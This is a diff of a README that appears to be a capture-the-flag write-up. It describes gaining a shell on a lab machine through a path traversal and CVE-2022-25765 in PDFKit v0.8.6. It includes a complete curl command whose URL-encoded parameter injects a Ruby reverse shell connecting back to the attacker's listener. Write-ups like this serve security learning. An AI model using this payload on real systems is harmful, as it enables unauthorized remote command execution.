visionthex/Precious/README.md

 After successfully accessing the PDF page using the path traversal vulnerability, I attempted to view the page source and accessed the console to investigate the error message that had been encountered earlier.
 Through this process, I was able to identify the version of PDFKIT being used on the website.

 After identifying the [(CVE-2022-25765)](https://github.com/PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell) vulnerability in PDFKIT v0.8.6, I exploited it by injecting a malicious code snippet into the website.
 To accomplish this, I set up a Python 3 HTTP server and a Netcat listener to receive the reverse shell connection.
-Then, using the 'curl' command in the terminal on Linux, I sent the payload containing the code snippet to the website.
+Then, using the `curl` command in the terminal on Linux, I sent the payload containing the code snippet to the website.
 This allowed me to gain remote access to the target system and execute arbitrary commands through the reverse shell connection.
 ```
 curl 'TARGET-URL' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: TARGET_URL' -H 'Connection: keep-alive' -H 'Referer: TARGET_URL' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2FLOCAL-IP%3ALOCAL-HTTP-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-IP%22%2CLOCAL-LISTEN-PORT%29%29%27%60'
 ```